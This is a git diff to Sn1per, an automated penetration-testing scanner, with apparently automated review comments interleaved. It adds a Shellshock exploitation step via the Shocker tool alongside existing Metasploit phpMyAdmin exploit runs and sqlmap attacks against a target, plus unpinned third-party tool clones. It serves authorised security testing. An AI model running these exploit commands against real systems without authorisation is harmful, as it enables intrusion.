diff --git a/README.md b/README.md index be0981d8..f6b488d7 100644 --- a/README.md +++ b/README.md @@ -25,7 +25,7 @@ Sn1per is an automated scanner that can be used during a penetration test to enu # ./sniper # ./sniper stealth # ./sniper port -# ./sniper web +# ./sniper web # ./sniper nobrute # ./sniper airstrike # ./sniper nuke @@ -46,6 +46,9 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc ``` ## CHANGELOG: +* v1.6c - Add report mode for web scans +* v1.6c - Fixed issues with Sublist3r and theharvester +* v1.6c - Added Shocker Shellshock exploitation scanner * v1.6b - Added Sublist3r sub-domain brute tool * v1.6b - Added cutycapt web screenshot util * v1.6a - Added improvements to recon phase @@ -91,5 +94,4 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc * v1.4 - Removed debug output from goohak from displaying on console ## FUTURE: -* Add in OpenVAS integration * Look into HTML reporting options diff --git a/install.sh b/install.sh index 9fd03717..740f626b 100644 --- a/install.sh +++ b/install.sh @@ -31,7 +31,7 @@ gem install rake gem install ruby-nmap net-http-persistent mechanize text-table echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET" -rm -Rf Findsploit/ Brutex/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ +rm -Rf Findsploit/ Brutex/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET" git clone https://github.com/1N3/Findsploit.git @@ -44,6 +44,7 @@ git clone https://github.com/Dionach/CMSmap.git git clone https://github.com/0xsauby/yasuo.git git clone https://github.com/johndekroon/serializekiller.git git clone https://github.com/aboul3la/Sublist3r.git +git clone https://github.com/nccgroup/shocker.git echo -e "$OKORANGE + -- --=[Setting up environment...$RESET" mkdir loot 2> /dev/null diff --git a/loot/README.md b/loot/README.md index d6f590dd..f6b488d7 100644 --- a/loot/README.md 
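Review bot: The added `git clone https://github.com/nccgroup/shocker.git` pulls an exploitation tool from a third-party repository at whatever its default branch points to at install time, with no commit pin and no failure check, so a force-pushed or compromised upstream lands straight into the code that later runs `python shocker/shocker.py` against targets. The surrounding clones share the pattern, but this hunk is where the new one is introduced. Since no `set -e` is visible in this part of install.sh, at minimum make the clone fatal, `git clone https://github.com/nccgroup/shocker.git || { echo "shocker clone failed" >&2; exit 1; }`, and follow it with a `git -C shocker checkout` of a reviewed commit so the installed exploit code is reproducible.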
+++ b/loot/README.md @@ -25,7 +25,7 @@ Sn1per is an automated scanner that can be used during a penetration test to enu # ./sniper # ./sniper stealth # ./sniper port -# ./sniper web +# ./sniper web # ./sniper nobrute # ./sniper airstrike # ./sniper nuke @@ -46,6 +46,11 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc ``` ## CHANGELOG: +* v1.6c - Add report mode for web scans +* v1.6c - Fixed issues with Sublist3r and theharvester +* v1.6c - Added Shocker Shellshock exploitation scanner +* v1.6b - Added Sublist3r sub-domain brute tool +* v1.6b - Added cutycapt web screenshot util * v1.6a - Added improvements to recon phase * v1.6a - Fixed small issue with 3rd party extension * v1.6a - Various improvements to overall optimization of scans @@ -89,5 +94,4 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc * v1.4 - Removed debug output from goohak from displaying on console ## FUTURE: -* Add in OpenVAS integration * Look into HTML reporting options diff --git a/sniper b/sniper index cb6deceb..5db39cff 100644 --- a/sniper +++ b/sniper @@ -23,7 +23,7 @@ # ./sniper # ./sniper stealth # ./sniper port -# ./sniper web +# ./sniper web # ./sniper nobrute # ./sniper airstrike # ./sniper nuke @@ -80,9 +80,16 @@ if [ "$MODE" = "report" ]; then exit fi +if [ "$MODE" = "web" ]; then + if [ "$OPT1" = "report" ]; then + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + exit + fi +fi + if [ "$MODE" = "stealth" ]; then if [ "$OPT1" = "report" ]; then - ./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi echo -e "$OKRED ____ $RESET" 
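Review bot: In the new `web` report block the `2>&1` is attached to `tee`, not to the `./sniper` call that produces the output, so sniper's stderr (tool errors, the `2> /dev/null`-less failures) never reaches the report file; the `stealth` line this hunk also rewrites has the same slip. The redirect belongs on the left side of the pipe: `./sniper "$TARGET" "$MODE" 2>&1 | tee "./loot/sniper-$TARGET-$MODE-$(date +%Y%m%d%H%M).txt"`. Quoting `$TARGET` additionally keeps a target containing spaces or glob characters from being split into extra arguments on the recursive invocation.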
@@ -132,13 +139,13 @@ if [ "$MODE" = "stealth" ]; then then dig -x $TARGET whois $TARGET - theharvester -d $TARGET -l 200 -b all -v -n -t 2> /dev/null + theharvester -d $TARGET -l 200 -b all -v -t 2> /dev/null dnsrecon -d $TARGET dnsrecon -d $TARGET -t zonewalk dnsrecon -d $TARGET -t axfr dnsenum $TARGET -f BruteX/wordlists/namelist.txt mv -f *_ips.txt loot/ 2>/dev/null - python Sublist3r/sublist3r.py -d $TARGET -b -t 30 2>/dev/null + python Sublist3r/sublist3r.py -d $TARGET -vvv 2>/dev/null fi echo "" echo -e "$OKGREEN################################### Running passive scans #########################$RESET" @@ -153,7 +160,7 @@ fi if [ "$MODE" = "airstrike" ]; then if [ "$OPT1" = "report" ]; then - ./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi echo -e "$OKRED ____ $RESET" @@ -199,13 +206,13 @@ if [ "$MODE" = "airstrike" ]; then then dig -x $a whois $a - theharvester -d $TARGET -l 200 -b all -v -n -t 2> /dev/null + theharvester -d $TARGET -l 200 -b all -v -t 2> /dev/null dnsrecon -d $a dnsrecon -d $a -t zonewalk dnsrecon -d $a -t axfr dnsenum $a -f BruteX/wordlists/namelist.txt mv -f *_ips.txt loot/ 2>/dev/null - python Sublist3r/sublist3r.py -d $TARGET -b -t 30 2>/dev/null + python Sublist3r/sublist3r.py -d $TARGET -vvv 2>/dev/null fi echo "" echo -e "$OKGREEN################################### Running passive scans #########################$RESET" @@ -238,7 +245,7 @@ fi if [ "$MODE" = "nuke" ]; then if [ "$OPT1" = "report" ]; then - ./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi for a in `cat $TARGET`; do 
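Review bot: Inside the airstrike block every other lookup in this hunk uses the per-host `$a` (`dig -x $a`, `whois $a`, `dnsrecon -d $a`, `dnsenum $a`), but the two rewritten lines still pass `-d $TARGET` to theharvester and sublist3r; if airstrike iterates the target list the way the nuke hunk below does (`for a in \`cat $TARGET\``), `$TARGET` here is the list file, so both tools are asked to enumerate a filename. The commit only changes the flags and leaves that mismatch in place. The lines should read `theharvester -d $a -l 200 -b all -v -t 2> /dev/null` and `python Sublist3r/sublist3r.py -d $a -vvv 2>/dev/null`; the enclosing `if` and loop start and end outside the hunk, so please confirm `$a` is in scope there.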
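Review bot: The nuke report filename now embeds `$TARGET`, but in this mode `$TARGET` is a file path (`for a in \`cat $TARGET\`` on the very next line), so a list given as `targets/hosts.txt` produces `./loot/sniper-targets/hosts.txt-nuke-…txt` and tee fails on the missing directory while the scan keeps running with no report written. Use the basename for the report name, e.g. `./sniper "$TARGET" "$MODE" 2>&1 | tee "./loot/sniper-$(basename "$TARGET")-$MODE-$(date +%Y%m%d%H%M).txt"`. The airstrike report line earlier in this diff has the same issue.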
@@ -278,13 +285,13 @@ if [ $SCAN_TYPE == "DOMAIN" ]; then dig -x $TARGET whois $TARGET - theharvester -d $TARGET -l 200 -b all -v -n -t 2> /dev/null + theharvester -d $TARGET -l 200 -b all -v -t 2> /dev/null dnsrecon -d $TARGET dnsrecon -d $TARGET -t zonewalk dnsrecon -d $TARGET -t axfr dnsenum $TARGET -f BruteX/wordlists/namelist.txt mv -f *_ips.txt loot/ 2>/dev/null - python Sublist3r/sublist3r.py -d $TARGET -b -t 30 2>/dev/null + python Sublist3r/sublist3r.py -d $TARGET -vvv 2>/dev/null fi echo "" echo -e "$OKGREEN################################### Pinging host ###################################$RESET" @@ -294,6 +301,8 @@ echo -e "$OKGREEN################################### Running port scan ######### if [ -z "$OPT1" ]; then nmap -sS -sV -T4 -A -O -p 1-65535 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml nmap -sU -sV -T4 -A -O -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 --open $TARGET +elif [ "$OPT1" == "web" ]; then + nmap -sS -sV -T4 -A -O -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-web-$TARGET.xml else nmap -sS -sV -T4 -A -O -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml nmap -sU -sV -T4 -A -O -p U:$OPT1 --open $TARGET @@ -477,6 +486,7 @@ else arachni http://$TARGET --output-only-positives sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" + python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80 fi fi 
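Review bot: The new `python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80` line runs a Shellshock exploitation tool that sends payloads to CGI paths, not a passive check, and it sits in the same branch as the msfconsole exploit run, so every scan reaching this `else` now attempts exploitation whether or not port 80 was reported open by the preceding nmap. Unless something outside the hunk gates this branch, a reader of the script has no signal that the web scan became an active attack step; add a comment above the line, `# active Shellshock exploitation attempt against common CGI paths (writes nothing to loot)`, and consider conditioning it on the port-80 nmap result. The enclosing `else` starts outside the hunk, so I cannot tell from here which modes reach it.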
@@ -619,6 +629,7 @@ else arachni https://$TARGET --output-only-positives sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" + python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 443 --ssl fi fi